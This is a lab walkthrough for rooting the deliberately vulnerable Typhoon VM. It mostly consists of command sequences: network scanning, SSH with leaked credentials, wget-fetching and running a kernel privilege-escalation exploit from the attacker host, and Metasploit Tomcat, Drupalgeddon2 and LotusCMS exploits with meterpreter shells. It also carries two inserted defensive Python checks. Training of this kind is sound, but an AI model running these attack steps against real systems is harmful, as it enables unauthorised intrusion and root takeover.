
Typhoon Exploit Step by Step: Penetrating Methodology

Typhoon Vulnerable Machine Exploit

Uploaded by

Tajria Sultana

Typhoon Exploit Step by Step

Typhoon VM contains several vulnerabilities and configuration errors. Typhoon can be used to test
vulnerabilities in network services, configuration errors, vulnerable web applications, password cracking
attacks, privilege escalation attacks, post exploitation steps, information gathering and DNS attacks.
Prisma trainings involve practical use of Typhoon.
Penetrating Methodology
• Network Scanning (Netdiscover, Nmap)
• 1st method of exploiting via exploring Mongodb
• Consider robots.txt
• Explore /Mongodb over browser
• Identify credential
• SSH Login
• Find out kernel version
• Kernel privilege escalation
• Obtain root access
• 2nd method of exploiting via Tomcat Manager (Metasploit)
• Generating bash payload
• Uploading bash payload
• Obtain root access
• 3rd Method: Exploiting Drupal CMS
• 4th Method: Exploiting Lotus CMS

Method 1: Exploiting by exploring Mongodb


Let's start off by scanning the network to find our target's IP.
1. ifconfig [to find the Kali IP]
2. netdiscover -r kali_ip [to find the target machine's IP]
3. nmap -A victim_ip [for information gathering] or nmap -T4 -sV -A -p0-65535 -vv --version-all -oN typhoon.nmap victim_ip
a. Further, we notice that there is an entry /mongoadmin/ in robots.txt, which might be useful.
b. We also noticed that port 8080 is open for Apache Tomcat/Coyote JSP Engine 1.1. This could be another way of exploiting this machine.
4. Moving on: since port 80 is also open, we browsed to the discovered directory /mongoadmin/ in
the browser. The result displayed is shown in the image. Here we set "change database" to
credentials(84mb). It will display a link of 2 Credentials. Click on it.
Clicking on the 2 Credentials link will give us 2 credentials, [username]: typhoon and
[password]: 789456123. These credentials might be a great help for further enumeration.
Then we simply logged in over SSH with the credentials Username: typhoon & Password: 789456123
5. ssh typhoon@victim_ip
6. lsb_release -a or uname -a or uname -r
Next we look for an exploit for Ubuntu 14.04 using searchsploit. After that, we copied the exploit
37292.c into the /root/ directory and started a Python HTTP server so the file can be downloaded on
the target machine.
7. searchsploit Ubuntu 14.04 [kali machine]
8. searchsploit -m 37292 [kali machine]
9. python -m SimpleHTTPServer 80 [kali machine]
Victim machine commands
10. cd /tmp
11. wget http://kali_ip/37292.c
12. gcc 37292.c -o rootshell
13. chmod 777 rootshell
14. ./rootshell
15. id
16. cd /root
17. cat root-flag
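
Method 1 starts from a robots.txt entry that advertises an unauthenticated admin interface. The following added example (not part of the original document) shows how a defender can parse robots.txt and flag Disallow entries that disclose such paths; the sample file and the keyword list are constructed assumptions, only /mongoadmin/ comes from the walkthrough.

```python
import re

# Constructed sample; only the /mongoadmin/ entry comes from the walkthrough.
SAMPLE_ROBOTS = """\
# constructed robots.txt
User-agent: *
Disallow: /mongoadmin/   # admin UI path named in the walkthrough
Disallow: /images/
Disallow:

User-Agent: examplebot
disallow: /backup.tar.gz
"""

# Assumed keyword list: fragments that usually mean "management UI or sensitive file".
SENSITIVE = re.compile(r"admin|manager|phpmy|backup|\.git|\.sql|config|console", re.I)


def parse_disallow(text):
    """Return [(user_agent, path)] for every non-empty Disallow rule."""
    rules, agents, in_rules = [], [], False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()       # drop comments
        if ":" not in line:
            continue
        field, value = (p.strip() for p in line.split(":", 1))
        field = field.lower()                      # field names are case-insensitive
        if field == "user-agent":
            if in_rules:                           # a rule was seen, so a new group starts
                agents, in_rules = [], False
            agents.append(value)
        elif field == "disallow":
            in_rules = True
            if value:                              # an empty Disallow hides nothing
                rules.extend((a, value) for a in agents or ["*"])
    return rules


def flag_disclosures(text):
    """Disallowed paths whose names advertise something worth browsing to."""
    return sorted({path for _, path in parse_disallow(text) if SENSITIVE.search(path)})


if __name__ == "__main__":
    for p in flag_disclosures(SAMPLE_ROBOTS):
        print("robots.txt discloses:", p, "-> require authentication or remove it")
```

A flagged path is a prompt to put the interface behind authentication or take it off the public listener; removing the robots.txt line alone does not protect it.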
Method 2: Exploiting via Tomcat Manager

We use the Tomcat Manager upload to get a Meterpreter session and then establish a reverse
connection to get root access.
In the Method 1 port scan, we noticed that port 8080 is open for Apache Tomcat/Coyote JSP
Engine 1.1, so let's browse to the target IP on port 8080 in the browser.
1. msfconsole
2. search tomcat_mgr_login
3. use auxiliary/scanner/http/tomcat_mgr_login
4. show options
5. set RHOSTS victim_ip
6. set STOP_ON_SUCCESS true
7. exploit
8. we get user:tomcat and password:tomcat
9. back
10. search tomcat_mgr_upload
11. use exploit/multi/http/tomcat_mgr_upload
12. set rhost victim_ip
13. set rport 8080
14. set httpusername tomcat
15. set httppassword tomcat
16. exploit
17. meterpreter > cd /tab
18. meterpreter > cat script.sh
19. meterpreter > cd /tmp
20. meterpreter > upload source_file_path/exploit.c exploit.c
21. meterpreter > shell
22. ls
23. gcc exploit.c -o exploit
24. ./exploit
25. id [root access gain]
26. python -c 'import pty;pty.spawn("/bin/bash")'
27. cd /root
28. ls
29. cat root-flag
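
Method 2 works because a Tomcat Manager account with deploy rights uses the password tomcat. The following added example (not part of the original document) audits a tomcat-users.xml for deploy-capable accounts with guessable passwords; the sample file, the password list and the 12-character threshold are constructed assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed sample; the tomcat/tomcat pair is the one the walkthrough reports.
SAMPLE = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <role rolename="manager-gui"/>
  <user username="tomcat" password="tomcat" roles="manager-gui,manager-script"/>
  <user username="deploy" password="Xq7!constructed-long-value" roles="manager-script"/>
  <user username="viewer" password="viewer" roles="manager-status"/>
</tomcat-users>
"""

# Roles that allow deploying a WAR, i.e. running code as the Tomcat user.
# "manager" is the single role name used by old Tomcat releases.
DEPLOY_ROLES = {"manager-gui", "manager-script", "manager"}
# Assumed short list of default-style passwords; extend for your environment.
COMMON = {"tomcat", "admin", "manager", "password", "s3cret", ""}


def audit_tomcat_users(xml_text):
    """Return [(username, reason)] for deploy-capable accounts with weak passwords."""
    findings = []
    root = ET.fromstring(xml_text.encode())
    for el in root.iter():
        if el.tag.rsplit("}", 1)[-1] != "user":   # ignore the optional XML namespace
            continue
        name = el.get("username", "")
        pw = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",")}
        if not roles & DEPLOY_ROLES:
            continue                               # account cannot upload applications
        if pw.lower() == name.lower():
            findings.append((name, "password equals username"))
        elif pw.lower() in COMMON:
            findings.append((name, "common default password"))
        elif len(pw) < 12:
            findings.append((name, "password shorter than 12 characters"))
    return findings


if __name__ == "__main__":
    for user, reason in audit_tomcat_users(SAMPLE):
        print(f"{user}: {reason}; rotate it and restrict /manager to admin hosts")
```

The check assumes clear-text passwords in the file; if the realm stores digested passwords, compare digests of the candidate list instead.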
Method 3: Exploiting Drupal CMS

Unfortunately, on exploring port 80 we didn't observe anything remarkable, so we try to
enumerate the web directories with the help of the Dirb tool.
1. dirb http://victim_ip
2. msfconsole
3. search drupal_drupalgeddon2
4. use exploit/unix/webapp/drupal_drupalgeddon2
5. msf exploit(/unix/webapp/drupal_drupalgeddon2) > set rhost victim_ip
6. msf exploit(/unix/webapp/drupal_drupalgeddon2) > set targeturi /drupal
7. msf exploit(/unix/webapp/drupal_drupalgeddon2) > exploit
8. meterpreter > cd /tab
9. meterpreter > cat script.sh
10. meterpreter > cd /tmp
11. meterpreter > upload source_file_path/exploit.c exploit.c
12. meterpreter > shell
13. ls
14. gcc exploit.c -o exploit
15. ./exploit
16. id [root access gain]
17. python -c 'import pty;pty.spawn("/bin/bash")'
18. cd /root
19. ls
20. cat root-flag

Method 4: Exploiting Lotus CMS

Unfortunately, on exploring port 80 we didn't observe anything remarkable, so we try to
enumerate the web directories with the help of the Dirb tool.
1. dirb http://victim_ip
2. msfconsole
3. search lcms_php_exec
4. use exploit/multi/http/lcms_php_exec
5. msf exploit(/multi/http/lcms_php_exec) > set rhost victim_ip
6. msf exploit(/multi/http/lcms_php_exec) > set uri /cms/
7. msf exploit(/multi/http/lcms_php_exec) > exploit
8. meterpreter > cd /tab
9. meterpreter > cat script.sh
10. meterpreter > cd /tmp
11. meterpreter > upload source_file_path/exploit.c exploit.c
12. meterpreter > shell
13. ls
14. gcc exploit.c -o exploit
15. ./exploit
16. id [root access gain]
17. python -c 'import pty;pty.spawn("/bin/bash")'
18. cd /root
19. ls
20. cat root-flag
